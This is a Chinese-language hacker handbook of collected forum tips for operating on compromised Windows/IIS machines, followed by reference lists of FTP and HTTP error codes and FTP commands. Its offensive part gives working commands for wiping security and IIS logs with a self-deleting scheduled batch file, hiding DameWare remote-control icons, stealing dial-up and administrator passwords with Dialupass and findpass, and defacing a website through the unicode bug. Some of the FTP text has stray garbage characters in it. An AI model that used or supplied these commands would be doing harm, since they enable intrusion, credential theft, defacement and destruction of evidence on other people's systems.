类型:信息型 名字:x.htw 风险等级:中 描述:IIS4.0上有一个应用程序映射htw--->webhits.dll,这是用于Inde    xServer的点击功能的。尽管你不运行IndexServer,该映射仍然有    效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文    件,数据库文件,和ASP源代码。 建议在IIS控制台中删除无用的应用程序映射 
类型:信息型 名字:qfullhit.htw 风险等级:中 描述:IIS4.0上有一个应用程序映射htw--->webhits.dll,这是用于Inde    xServer的点击功能的。尽管你不运行IndexServer,该映射仍然有    效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文    件,数据库文件,和ASP源代码。 建议:建议在IIS控制台中删除无用的应用程序映射 
类型:信息型 名字:iirturnh.htw 风险等级:中 描述:IIS4.0上有一个应用程序映射htw--->webhits.dll,这是用于Inde    xServer的点击功能的。尽管你不运行IndexServer,该映射仍然有    效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文    件,数据库文件,和ASP源代码。 建议:建议在IIS控制台中删除无用的应用程序映射

【clearlogs】

清除日志(二)

===================================1.系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe
使用方法:Usage: clearlogs [\\computername] <-app / -sec / -sys>
       -app = 应用程序日志       -sec = 安全日志       -sys = 系统日志a. 可以清除远程计算机的日志** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名** 然后开始清除: 方法   clearlogs \\ip -app 这个是清除远程计算机的应用程序日志 clearlogs \\ip -sec 这个是清除远程计算机的安全日志 clearlogs \\ip -sys 这个是清除远程计算机的系统日志
b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面  然后清除.  方法:
clearlogs  -app 这个是清除远程计算机的应用程序日志 clearlogs  -sec 这个是清除远程计算机的安全日志 clearlogs  -sys 这个是清除远程计算机的系统日志
安全日志已经被清除.Success: The log has been cleared  成功.
为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了. 例如建立一个 c.bat
rem ============================== 开始@echo offclearlogs -appclearlogs -secclearlogs -sysdel clearlogs.exedel c.batexitrem ============================== 结束
在你的计算机上面测试的时候 可以不要 @echo off  可以显示出来. 你可以看到结果第一行表示: 运行时不显示窗口第二行表示: 清除应用程序日志第三行表示: 清除安全日志第四行表示: 清除系统日志第五行表示: 删除 clearlogs.exe 这个工具第六行表示: 删除 c.bat 这个批处理文件第七行表示: 退出
用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法
AT 时间 c:\c.bat
之后你就可以安全离开了. 这样才更安全一点.
===================================2.清除iis日志:工具:cleaniis.exe使用方法:iisantidote iisantidote stopstop opiton will stop iis before clearing the files and restart it after exemple : c:\winnt\system32\logfiles\w3svc1\ dont forget the \
使用方法解释:cleaniis.exe iis日志存放的路径 清除参数
什么意思呢??我来给大家举个例子吧: cleaniis c:\winnt\system32\logfiles\w3svc1\ 192.168.0.1这个表示清除log中所有此IP(192.168.0.1)地址的访问记录.   -----推荐使用这种方法
cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/ 这个表示清除这个目录里面的所以的日志
c:\winnt\system32\logfiles\w3svc1 代表是iis日志的位置(windows nt/2000) 这个路径可以改变c:\windows\system32\logfiles\w3svc1 代表是iis日志的位置(windows xp/2003) 这个路径可以改变
这个测试表示 在日志里面没有这个ip地址. 我们看一下日志的路径   再来看一下我们的ip(192.168.0.1)已经没有了.已经全部清空.

同样这个也可以建立批处理. 方法同上面的那个.
===================================3.清除历史记录及运行的日志:cleaner.exe直接运行就可以了.
===================================4.察看blackice的日志.这个地方我们可以清除的看到  防火墙的日志.
这个表示 有人发过来带有病毒的email附件.  ip是: 220.184.153.116 tcp_probe_other  表示 通过tcp 扫描 或者利用别的和你建立连接 通信这个表示通过端口 80 扫描iis病毒 nimda这里需要很多的计算机协议知识. 同时也需要对英语有了解才能更好的分析 如果对英语不好 你可以装一个金山词霸. 一般情况下 我们可以 对一些可以不用管. 一般这三种情况 不用去管. 最上面的 critical 这个  可以去关注一下 . 一般是确实有别的计算机扫描或者入侵你的计算机
count 代表次数   intruder 是对方的ip  event 是通过什么方式(协议) 扫描或者想入侵的 time表示时间


5.===================================netstat -an 表示什么意思?使用这个命令可以察看到和本机的所有的连接.
Proto  Local Address          Foreign Address        State协议   本地端口及IP地址       远程端口及IP地址      状态
LISTENING  监听状态  表示等待对方连接
ESTABLISHED  正在连接着.
TCP  协议是TCP
UDP  协议是UDP
TCP    192.168.0.10:1115      61.186.97.54:80        ESTABLISHED这个表示  利用tcp协议 本机ip(192.168.0.10)通过端口:1115 和远程ip(61.186.97.54)端口:80连接80端口 表示  http  就是你在访问这个网站. 
一般情况下远程ip的端口: 80 21 8000 这个都是正常的. 如果是别的 就可以看一下你的计算机了.





【DameWare NT Utilities 隐藏图标】打开INI文件, 打开INI文件后, 里面添加上如下文字:


[Settings] Port=6129 Adgang NTLM=Yes Adgang 1= Adgang 2= Adgang 3=0 Notify On New Connection=NoPermission Required=No Show SysTray Icon=No Permission Required for non Admin=Yes On Disconnect Logoff Desktop=No Force Applications Close=No On Disconnect Lock Workstation=No Logon At Logon Desktop Only=No Enable Add Client Connection Menu=Yes Enable Disconnection Menu=Yes 


里面有好多东东不管他,把上面面这段加到前面,存盘退出. 

【dialupass】可以上传Dialupass工具到对方硬盘,在PcShare的超级终端里输入如下命令:
Dialupass.exe/alluser /stext "c:\1.txt"
然后到C盘的1.txt里找到帐户和密码,然后按照上面开反向跳板的方法进入互联星空登陆,就可以消费了.

【DOS下修改属性】  attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。 attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读


【DOS下常用的FTP命令】新手要进步,老停留在图形界面软件上是不行的,一定要逐步熟悉一些DOS命令。往肉鸡上传文件的途径很多,FTP就是其中之一,下面就是最常用的几条FTP命令:
开始-运行 里输入ftp后就可以使用下面的命令了:1. open:与ftp服务器相连接; 2. send(put):上传文件; 3. get:下载文件; 4. mget:下载多个文件; 5. cd:切换目录; 6. dir:查看当前目录下的文件; 7. del:删除文件; 8. bye:中断与服务器的连接。 



【echo命令小解】echo命令主要功能简单点说就是 开启或关闭批处理命令行显示在屏幕上 它是批文件的令  属于内部命令 内部命令就是常驻于内存的命令 在任意路径下输入均执行 
echo命令的目的有两个:1.避免不需要的命令显示来干扰屏幕2.在屏幕上给用户显示提示信息  如:我们在dos下常见的提示 "请插入A盘"
用不带参数的echo命令 则显示当前的echo状态信息 
在以前的版本是没有的 在dos 3.3后的版本又增加了一个显示空串效果的命令 : echo+  可以利用该命令在显示中跳过一行,在建批处理命令中有实际上的意义 如:我们想独行显示 请插入A盘   则我们可以在 请插入A盘 前一句末尾添加echo+ 则可以在下一行显示该句了  大家把下面新建为txt后该为bat在dos下试试
@echo offecho+echo 牛族牛族!!!最牛的族!!!!!!!!!!!!!!echo+pauseecho draper!!!  >a.txtecho draper is winner!!!!!>> a.txta.txtdel a.txt
很简单 为了让你给好的理解
下面再给讲讲和unicode漏洞有关的echo命令 以前有人写了 我再解释一下 
echo [message]>[file name] 这个命令是把指定的字符串送到指定的文件中
注意我的说明:“>>”将把内容将填加到文件中,“>”将原文件内容覆盖
比如我前几天我利用unicode漏洞后顺利进入台湾的一家公司的主页后 这样进行:echo open upload.51.com> c:\draper.txt echo draper >> c:\draper.txt echo draper >> c:\draper.txt echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\draper.txt ftp -s:c:\draper.txtdel  c:\draper.txtbye
 强调一下:del一句一定记得 不然别人很容易的看到你的密码. 还有index.htm是你预先设计好的  用bye最后退出FTP对话  呵呵黑主页就那么几招.进行上面的步骤有个前提 就是你已经拿到了admin的权限  
好了,说到这里阿  不懂的慢慢理解!!!!!draper is winner!!!!!
ECHO命令的使用1. 作为控制批处理命令在执行时是否显示命令行自身的开关 
格式:ECHO [ON|OFF]
如果想关闭“ECHO OFF”命令行自身的显示,则需要在该命令行前加上“@”。
2. 显示当前ECHO设置状态 
格式:ECHO
3. 输出提示信息 
格式:ECHO信息内容
上述是ECHO命令常见的三种用法,也是大家熟悉和会用的,但作为DOS命令淘金者你还应该知道下面的技巧:
4. 关闭DOS命令提示符 
在DOS提示符状态下键入ECHO OFF,能够关闭DOS提示符的显示使屏幕只留下光标,直至键入ECHO ON,提示符才会重新出现。
5. 输出空行,即相当于输入一个回车 
格式:ECHO.
值得注意的是命令行中的“.”要紧跟在ECHO后面中间不能有空格,否则“.”将被当作提示信息输出到屏幕。另外“.”可以用,:;”/[\]+等任一符号替代。
在下面的例子中ECHO.输出的回车,经DOS管道转向作为TIME命令的输入,即相当于在TIME命令执行后给出一个回车。所以执行时系统会在显示当前时间后,自动返回到DOS提示符状态:
C:>ECHO.|TIME
ECHO命令输出空行的另一个应用实例是:将ECHO.加在自动批处理文件中,使原本在屏幕下方显示的提示画面,出现在屏幕上方。
6. 答复命令中的提问 
格式:ECHO答复语|命令文件名
上述格式可以用于简化一些需要人机对话的命令(如:CHKDSK/F;FORMAT Drive:;del *.*)的操作,它是通过DOS管道命令把ECHO命令输出的预置答复语作为人机对话命令的输入。下面的例子就相当于在调用的命令出现人机对话时输入“Y”回车:
C:>ECHO Y|CHKDSK/F
C:>ECHO Y|DEL A :*.*
7. 建立新文件或增加文件内容 
格式:ECHO 文件内容>文件名
ECHO 文件内容>>文件名
例如:C:>ECHO @ECHO OFF>AUTOEXEC.BAT建立自动批处理文件
C:>ECHO C:\CPAV\BOOTSAFE>>AUTOEXEC.BAT向自动批处理文件中追加内容
C:TYPE AUTOEXEC.BAT显示该自动批处理文件
@ECHO OFF
C:\CPAV\BOOTSAFE
8. 向打印机输出打印内容或打印控制码 
格式:ECHO 打印机控制码>PRN
ECHO 打印内容>PRN
下面的例子是向M-1724打印机输入打印控制码。<Alt>156是按住Alt键在小键盘键入156,类似情况依此类推:
C:>ECHO +156+42+116>PRN(输入下划线命令FS*t)
C:>ECHO +155@>PRN(输入初始化命令ESC@)
C:>ECHO.>PRN(换行)
9. 使喇叭鸣响 
C:>ECHO ^G
“^G”是用Ctrl+G或Alt+007输入,输入多个^G可以产生多声鸣响。使用方法是直接将其加入批处理文件中或做成批处理文件调用。
10.执行ESC控制序列修改屏幕和键盘设置 
我们知道DOS的设备驱动程序ANSI.SYS提供了一套用来修改屏幕和键盘设置的ESC控制序列。如执行下述内容的批处理程序可以把功能键F12定义为DOS命令“DIR/W”,并把屏幕颜色修改为白色字符蓝色背景。
@ECHO”←[0;134;”DIR/W”;13p
@ECHO”←[1;37;44m
(注:批处理文件中“←”字符的输入方法是在编辑状态下按Alt中小键盘上的27)
【EXE文件 变成 服务】打开命令行程序CMD.exe (或命令行窗口)。  输入: c:\>instsrv "服务的名称" c:\winnt\srvany.exe 回车  运行注册表程序 regedit.exe  建立 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\"服务的名称" 子项。  选"服务的名称",按右键,新建“项”。  取名: Parameters 。  选择 Parameters 项,再新建“字符串值”。  “字符串值”取名: Application 。  改 Application的值为应用程序的路径及文件名(比如 C:\winnt\i386.exe) 。  选择 Parameters 项,再新建“字符串值”。  “字符串值”取名: AppDirectory 。  改 Application的值为应用程序的路径 (比如 C:\winnt) 。  关闭注册表程序,打开控制面板-〉管理工具-〉服务。  选择"服务的名称",选择“属性”。  选择"登陆"页,在"允许服务与桌面交互"前打勾。  启动服务。ok!  如果出现命令行程序界面, 则把"允许服务与桌面交互"前的勾去掉,然后重新启动服务。
【findpass】2 强强联手——Pulist和findpass配合盗取密码   适用点:肉鸡上当前登录的账户是系统管理员。   特点:可立即得到当前登录的管理员账户和密码。   如果我们来不及等到肉鸡重启或只想得到当前管理员密码,那么“Pulist”和“findpass”这两个小工具就可以派上用场了。   当管理员以图形界面方式登录系统时,登录的域名和用户名以明文方式存储在Winlogon进程里,findpass就是利用Winlogon的PID号和正确的域名在加密的内存中寻找密文,然后再把密码从中还原出来,这样我们就能得到管理员密码。   首先,在肉鸡上建立一个文件夹(如“C:\pass”),把这两个工具上传到该文件夹中。上传成功后进入肉鸡的命令提示符窗口,用“CD”命令进入“pass”文件夹。   接着输入“Pulist”,程序会把当前系统运行的进程显示出来,并标明PID号。我们需要在其中找到两样东西,即“Winlogon”进程的PID号(这里是652)和当前管理员登录的域和账户名(这里是AJ和jie)。 
  然后输入“findpass”,使用格式为“findpass 域 用户名 Winlogon的PID值”的命令,在命令提示符窗口中输入“findpass AJ jie 652”并回车即可。在“The logon information is”后面显示的“66795863”就是我们所需要的密码。   提示:findpass只对以图形登录方式进行登录的管理员账号有效
【FTP反馈信息集锦】FTP反馈信息集锦  [ 作者:阿榕收集整理    转贴自:阿榕论坛    点击数:483    更新时间:2004-2-29    文章录入:阿榕 ]  FTP术语 150    文件状态良好,打开数据连接 200    命令成功 202    命令未实现 211    系统状态或系统帮助响应 212    目录状态 213    文件状态 214    帮助信息,信息仅对人类用户有用 215    名字系统类型 220    对新用户服务准备好 221    服务关闭控制连接,可以退出登录 225    数据连接打开,无传输正在进行 226    关闭数据连接,请求的文件操作成功 227    进入被动模式 230    用户登录 250    请求的文件操作完成 257    创建"PATHNAME" 331    用户名正确,需要口令 332    登录时需要帐户信息 350    请求的文件操作需要进一步命令 421    连接用户过多 425    不能打开数据连接 426    关闭连接,中止传输 450    请求的文件操作未执行 451    中止请求的操作:有本地错误 452    未执行请求的操作:系统存储空间不足 500    格式错误,命令不可识别 501    参数语法错误 502    命令未实现 503    命令顺序错误 504    此参数下的命令功能未实现 530    账号或密码错误 532    存储文件需要帐户信息 550    未执行请求的操作 551    请求操作中止:页类型未知 552    请求的文件操作中止,存储分配溢出 553    未执行请求的操作:文件名不合法 
●400-Bad request失败请求错误(最常见的错误之一)   这个问题在于你输入的网址有错误。有可能是你要连接的服务器不能 识别你要求浏览的文档,或者你没有访问它的权利甚至它根本就是不存在 的。仔细检查一下你是否将网址写错,包括大小写(一般网址是不分大小 写的,可是某些特殊文档例外)、符号或是多打了空格。这是最常见的一 类错误。 
●401-Unauthorized未经过认证的错误 
  可能是你访问到了有密码保护的站点而你输入的密码不正确。首先你 要确认是否有访问该网站的权利(通常有用户名和密码),密码是严格区 分大小写的,一般是不能匿名的。 
●403-Forbidden禁止访问错误 
  你可能没有权利访问这个文档,有时某些页面是不允许直接访问的( 没有炼接到上面的页面),当然也有被口令保护的可能。这时你须要回到 上一页面输入口令才能够访问。 
●404-Not found没有找到错误(最常见的错误之二) 
  这是我们经常遇到的访问出错情况。首先可能是你的网址有错误(漏 字、大小写、符号的差异等),或者是网址最后的扩展名不对,当然也有 可能是这个地址或者页面根本不存在。 
●500-Server Error服务器错误 
  通常是对方网页程序设计错误而产生的,可能是正在修改和上传网页 ,等待对方网页纠正错误后再试吧。 
●503-Service unavailable服务不可用错误(常见错误之三) 
  这也有很多可能性:你的ISP服务器死机,你公司的网关断了(如果你 通过单位的局域网上网),或者你自己的系统出问题了。最好的办法是等 一会再试试,如果仍然不行就去看看自己的机器、询问一下网络管理员。 
●Bad file request错误文件请求 
  你的浏览器要求访问数据域和下拉列表等特殊格式的文件和文档,然 而访问的页面没有这些表单,或者表单出错。你只有通知管理员更新表单。 
●Socks Error代理服务器出错 (常见错误之?IMG SRC='/big5/images/smiles/smile_sleepy.gif' ALT='sleepy' WIDTH=15 HEIGHT=15 border=0 ALIGN='absmiddle'> 
  这是在代理环境下客户机上最常见的错误,原因是:连接超时、代理 服务器已经关闭或连线已经断开。咨询服务器管理员查找相应的错误并对 照解决。 
●Request time out连接超时错误(常见错误之五) 
  连接超时,主要原因可能是你的网络速度太差,或者你在浏览器中设 置了超时时间选项,也可能是因为服务器的问题,多试试看。 
●An Unexpected Web Error Occurred不可预知的网页错误 
  发生此错误的原因很多,没有任何详细的解释和解决办法。只有采用 上面说的逐级访问父目录的办法,或者放弃。 
●Cannot add form submission result to bookmark list无法将表单结 果加入书签列表 
  当你通过搜索找到一堆网址,想把结果存到书签中,由于你得到的可 能是一个动态的网页,不能够将它加到书签上。你可以将结果页面作为一 个HTML文件存到你的硬盘上。 
●Failed DNS lookup DNS查找失败错误 
  DNS(Domain Name System域名管理系统)用于将网址翻译成合法的 因特网物理地址,出现这种错误可能是你输入地址有错误,检查一下输 入的地址,然后重新试试。 
●File contains no data文件无内容错误 
  你访问的站点没错,但没有Web页面,只有重试几次看看。 
●Connection refused by host主机拒绝连接 
  可能是你无权访问这个站点,或者它拒绝你的IP(或者IP段)访问, 也有可能是口令保护造成的。 
●Viewer not found找不到查看器错误 
  网上有多种格式的文件,比如声音文件、压缩文件、动画文件等。如 果你的浏览器没有定义相关的软件就不能够访问。简单的解决方法就是下 载并安装相关的软件。 
●Unable to locate the server不能定位服务器错误 
  可能你输入的网址有问题,或者服务器不存在,或者是服务器已经被 取消了(这时一般会有一个页面提示你转到相应的页面)。重新检查一下 你输入的地址,重试一下。 
●Host unavailable主机不可用错误 
  有可能主机死机了。稍等一会,重新刷新再看看。 
●Network connection was refused by the server服务器拒绝网络连接错误 
  要求访问A务器的用户太多,无法对你的要求应答。只有不停地刷新 了再试一试。 
●Host unknown主机找不到错误 
  通常是服务器死机了,或者是你的网络连接中断所致。 
二、使用FTP、新闻组、Foxmail和OE、CuteFTP、NetAnts中常见的错误和解决 ●Connet:10061没有连接 
  连接失败或者没有连接,也可能是你要连接的主机根本就不提供FTP服务。 
●Not connet,access deny拒绝连接访问错误 
  不能匿名登录和访问,你必须提供用户名和密码才能登录。只有去申请 一个用户名你才能进入主机。 
●Bad target URL目标URL错误 
  在使用网络蚂蚁NetAnts时最常见的错误,是你的JOB的URL地址有问题, 可能是你输入有问题,也可能是服务器上连接出错。 
●Too many users用户太多 
  当你登录FTP时出现的错误。这是由于访问该FTP站点的用户太多所致, 你可到换个时间段试一试。 
●You can't log on as an anonymous user你不能作为匿名用户登录 
  有些FTP站点允许通过匿名(就是使用anonymous的用户名和口令)访问 ,但有些仅允许其成员(拥有特定用户名和口令)访问。另外一种可能是你 的浏览器不支持匿名FTP访问,你可以使用专门的FTP软件(比如CUTEFTP) 访问。 
●Permission denied拒绝访问 
  当你试图上传一个文件到FTP站点上时,没有权限或者是站点太忙所致。 
●NNTP server error新闻组服务器错误 
  当你试图登录一个新闻讨论组时出现的错误,可能是服务器关闭或者连 接中断引起。 
●Too many connections——try again later太多的连接,等一会再试   这也是由于用户过多产生的错误信息,你换个时间访问吧! 
●Receive and send data error接收或发送数据出错 
  在使用Foxmail或者Outlook Express时,通常由于线路质量不好,与服 务器的连接被意外中断所致。 
●Connect server fail连接服务器失败 
  在使用Foxmail或者Outlook Express时,不能连接到你的邮件服务器。 请检查你是否已连接到你的ISP或者网络是否已经断开,如果邮件服务器已 关掉或太忙,也会出现这种情况。 
●Can’t resolve server address不能解析服务器地址 
  在使用Foxmail或者Outlook Express时,解析服务器地址失败,通常是 因为DNS服务器未连接,或POP3(SMTP)服务器名字写错,纠正信箱的服务器 设置参数就可以了。 
●The actual size of downloading file is unknown下载文件大小无法确定 
  这是NetAnts的一个Bug,因为NetAnts在下载文件前,必须先知道文件 的大小,出现这个错误的原因是因为服务器的应答中没有包括文件大小。 在以后版本中会得到改进。 
●Warning The server says 553 sorry,that domain isn’t in my list of allowed reception发送邮箱地址错误 
  在使用Outlook Express和Foxmail时发生的错误,错误在于SMTP服务器 不接受你要发送的邮件地址。通常,一些免费的邮件服务器只接受发送给它 自己的邮件地址。解决办法:更换一个SMTP服务器地址。 
(二) FTP下载错误资讯: 有很多的朋友不太会看FTP资讯错误,如果下载不了,一定是出了错误,自己要知道是什?地方错了。?什?错。 下面说说几个非常典型的。 530,说明密码错误。 550,说明位址有错误,可能是盗连没有改。 详细的FTP错误列表 110 Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and 重新?动标志回应。这种情况下,资讯是精确的并且不用特别的处理;可以这样看:标记 yyyy = mmm 中 yyyy是 用户进程资料流程标记,mmmm是伺服器端相应的标记(注意在标记和等号间的空格) ----------------------------------- 120 Service ready in nnn minutes. 服务在NNN时间内可用 ----------------------------------- 125 Data connection already open; transfer starting. 资料连接已经打开,开始传送资料. ----------------------------------- 150 File status okay; about to open data connection. 文件状态正确,正在打开资料连接. ----------------------------------- 200 Command okay. 命令执行正常结束. ----------------------------------- 202 Command not implemented, superfluous at this site. 命令未被执行,此站点不支援此命令. ----------------------------------- 211 System status, or system help reply. 系统状态或系统帮助资讯回应. ----------------------------------- 212 Directory status. 目录状态资讯. ----------------------------------- 213 File status. $XrkxmL= 文件状态资讯. ----------------------------------- 214 Help message.On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user. 帮助资讯。关于如何使用本伺服器或特殊的非标准命令。此回复只对人有用。 ----------------------------------- 215 NAME system type. Where NAME is an official system name from the list in the Assigned Numbers document. NAME系统类型。 ----------------------------------- 220 Service ready for new user. 新连接的用户的服务已就绪 ----------------------------------- 221 Service closing control connection. 控制连接关闭 ----------------------------------- 225 Data connection open; no transfer in progress. 资料连接已打开,没有进行中的资料传送 ----------------------------------- 226 Closing data connection. Requested file action successful (for example, file transfer or file abort). 正在关闭资料连接。请求文件动作成功结束(例如,文件传送或终止) ----------------------------------- 227 Entering Passive Mode (h1,h2,h3,h4,p1,p2). 进入被动模式 ----------------------------------- 230 User logged in, proceed. Logged out if appropriate. 用户已登入。 如果不需要可以登出。 ----------------------------------- 250 Requested file action okay, completed. _ 被请求文件操作成功完成 63 ----------------------------------- , 257 "PATHNAME" created. 路径已建立 ----------------------------------- 331 User name okay, need password. , 用户名存在,需要输入密码 ----------------------------------- 332 Need account for login. 需要登陆的账户 ----------------------------------- 350 Requested file action pending further information U 对被请求文件的操作需要进一步更多的资讯 ----------------------------------- 421 Service not available, closing control connection.This may be a reply to any command if the service knows it must shut down. (O&; 服务不可用,控制连接关闭。这可能是对任何命令的回应,如果服务认?它必须关闭 ----------------------------------- 425 Can't open data connection. 打开资料连接失败 ----------------------------------- 426 Connection closed; transfer aborted. 连接关闭,传送中止。 ----------------------------------- 450 Requested file action not taken. 对被请求文件的操作未被执行 ----------------------------------- 451 Requested action aborted. Local error in processing. 请求的操作中止。处理中发生本地错误。 ----------------------------------- 452 Requested action not taken. Insufficient storage space in system.File unavailable (e.g., file busy). 请求的操作没有被执行。 系统存储空间不足。 文件不可用 ----------------------------------- 500 Syntax error, command unrecognized. This may include errors such as command line too long.. 语法错误,不可识别的命令。 这可能是命令行过长。 ----------------------------------- } 501 Syntax error in parameters or arguments. 参数错误导致的语法错误 ----------------------------------- 502 Command not implemented. 命令未被执行 ----------------------------------- 503 Bad sequence of commands. ) 命令的次序错误。 ----------------------------------- 504 Command not implemented for that parameter., 由于参数错误,命令未被执行 ----------------------------------- 530 Not logged in. 没有登录 ----------------------------------- 532 Need account for storing files. 存储文件需要账户资讯! ----------------------------------- 550 Requested action not taken. File unavailable (e.g., file not found, no access). 请求操作未被执行,文件不可用。 ----------------------------------- | 551 Requested action aborted. Page type unknown. +.+ 请求操作中止,页面类型未知 ----------------------------------- 552 Requested file action aborted. Exceeded storage allocation (for current directory or dataset). 对请求文件的操作中止。 超出存储分配 ----------------------------------- 553 Requested action not taken. File name not allowed 请求操作未被执行。 档案名不允许 ----------------------------------- . ----------------------------------- 这种错误跟http协定类似,大致是: 2开头--成功 A/ 3开头--许可权问题 4开头--文件问题 5开头--伺服器问题 例如下面这个例子: Sat Feb 15 00:13:02 2003 正在连接 61.143.241.231 [IP=61.143.241.231:21] Sat Feb 15 00:13:02 2003 Socket已连接 ,等待欢迎资讯 Sat Feb 15 00:13:03 2003 220 http://www.starwcn.net ;free Ftp Server 231 Sat Feb 15 00:13:03 2003 USER ftper Sat Feb 15 00:13:03 2003 331 Password required for ftper. Sat Feb 15 00:13:03 2003 PASS ******** Sat Feb 15 00:13:03 2003 530 Login incorrect. Sat Feb 15 00:13:03 2003 有错误发生! Sat Feb 15 00:13:03 2003 等待 10秒后重试 这就是说明密码不正确。 
(三) 常见FTP登陆Log资讯 
1. Connected. Waiting for response. 220 Serv-U FTP Server v4.0 for WinSock ready... USER anonymous 530 Sorry, no ANONYMOUS access allowed. QUIT 这个就是不许匿名登录啦 2. Connected. Waiting for response. 220 Serv-U FTP Server v4.0 for WinSock ready... USER test 331 User name okay, need password. PASS xxxxxx 530 Not logged in. QUIT 一般是密码输入错误时出现的资讯,但对于Serv-U来说,如果没有这个帐号(test)存在,也会?生同样的出错资讯。 3. Connecting to xxx.xxx.xxx.xxx, Port 21 (#1) ERROR: Connection timed out 这个表明对方未开机,也可能是对方不在你能访问的范围内 4. Connecting to xxx.xxx.xxx.xxx Port 21 (#1) ERROR: Connection refused 这个一般表明对方已开机,但未开?FTP服务(没有开Serv-U) 也可能?对方不提供在这个埠上的服务 5. Connecting to xxx.xxx.xxx.xxx, Port 21 (#1) Connected. Waiting for response. Disconnected from server. Connection attempt failed. Waiting for retry... 出现这个资讯实在是很倒楣,你极有可能被对方Ban了。 过半小时后再试吧 6. Connecting to xxx.xxx.xxx.xxx, Port 21 (#1) Connected. Waiting for response. USER XXX 331 User name okay, need password PASS xxxxxx 530 Not logged in, unauthorized IP address. QUIT 这个有点麻烦,你的IP不在站长允许访问的IP范围内 7. Connected. Waiting for response. 220 Serv-U FTP Server v4.0 for WinSock ready... USER user 421 Too many users - please try again later. 哈哈,这个很常见吧,用户太多,稍后再试吧 8. Connected. Waiting for response. 220 Serv-U FTP Server v4.0 for WinSock ready... USER test 530 Not logged in, only one session from same IP allowed at a time. QUIT 每个IP只能开一个下载,就不要用多线程啦,小心Ban了你。 9 230 User logged in, proceed. 状态:> 登录成功。 命令:> PWD 257 "/" is current directory. 状态:> Home directory: / 状态:> 该站点支援 features。 状态:> 该站点支援 SIZE。 状态:> 该站点可以续传中断的下载。 命令:> REST 0 350 Restarting at 0. Send STORE or RETRIEVE. 命令:> PORT 10,7,72,20,5,71 530 Only client IP address allowed for PORT command. 错误:> 未登录。 错误:> 建立资料 socket 失败。 状态:> 连接已关闭。 有些ftp要求使用post,一般默认pasv,这是应该使用pasv,错用post所致不能登陆   

【FTP命令】FTP命令是Internet用户使用最频繁的命令之一,熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。如果你想学习使用进行后台FTP下载,那么就必须学习FTP指令。
FTP的命令行格式为: ftp -v -d -i -n -g [主机名] ,其中
-v 显示远程服务器的所有响应信息;
-n 限制ftp的自动登录,即不使用;.n etrc文件;
-d 使用调试方式;
-g 取消全局文件名。

FTP使用的内部命令如下(中括号表示可选项):
1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip
2.$ macro-ame[args]: 执行宏定义macro-name。
3.account[password]: 提供登录远程系统成功后访问系统资源所需的补充口令。
4.append local-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii:使用ascii类型传输方式。
6.bell:每个命令执行完毕后计算机响铃一次。
7.bin:使用二进制文件传输方式。
8.bye:退出ftp会话过程。
9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。
10.cd remote-dir:进入远程主机目录。
11.cdup:进入远程主机目录的父目录。
12.chmod mode file-name:将远程主机文件file-name的存取方式设置为mode,如:chmod 777 a.out。
13.close:中断与远程服务器的ftp会话(与open对应)。
14.cr:使用asscii方式传输文件时,将回车换行转换为回行。
15.delete remote-file:删除远程主机文件。
16.debug[debug-value]:设置调试方式, 显示发送至远程主机的每条命令,如:deb up 3,若设为0,表示取消debug。
17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件
18.disconnection:同close。
19.form format:将文件传输方式设置为format,缺省为file方式。
20.get remote-file[local-file]: 将远程主机的文件remote-file传至本地硬盘的local-file。
21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
22.hash:每传输1024字节,显示一个hash符号(#)。
23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:help get。24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。
25.image:设置二进制传输方式(同binary)。
26.lcd[dir]:将本地工作目录切换至dir。
27.ls[remote-dir][local-file]:显示远程目录remote-dir, 并存入本地文件local-file。
28.macdef macro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
29.mdelete[remote-file]:删除远程主机文件。
30.mdir remote-files local-file:与dir类似,但可指定多个远程文件,如 :mdir *.o.*.zipoutfile 。
31.mget remote-files:传输多个远程文件。
32.mkdir dir-name:在远程主机中建一目录。
33.mls remote-file local-file:同nlist,但可指定多个文件名。
34.mode[modename]:将文件传输方式设置为modename, 缺省为stream方式。
35.modtime file-name:显示远程主机文件的最后修改时间。
36.mput local-file:将多个文件传输至远程主机。
37.newer file-name: 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。
39.nmap[inpattern outpattern]:设置文件名映射机制, 使得文件传输时,文件中的某些字符相互转换, 如:nmap $1.$2.$3[$1,$2].[$2,$3],则传输文件a1.a2.a3时,文件名变为a1,a2。 该命令特别适用于远程主机为非UNIX机的情况。
40.ntrans[inchars[outchars]]:设置文件名字符的翻译机制,如ntrans1R,则文件名LLL将变为RRR。
41.open host[port]:建立指定ftp服务器连接,可指定连接端口。
42.passive:进入被动传输方式。
43.prompt:设置多个文件传输时的交互提示。
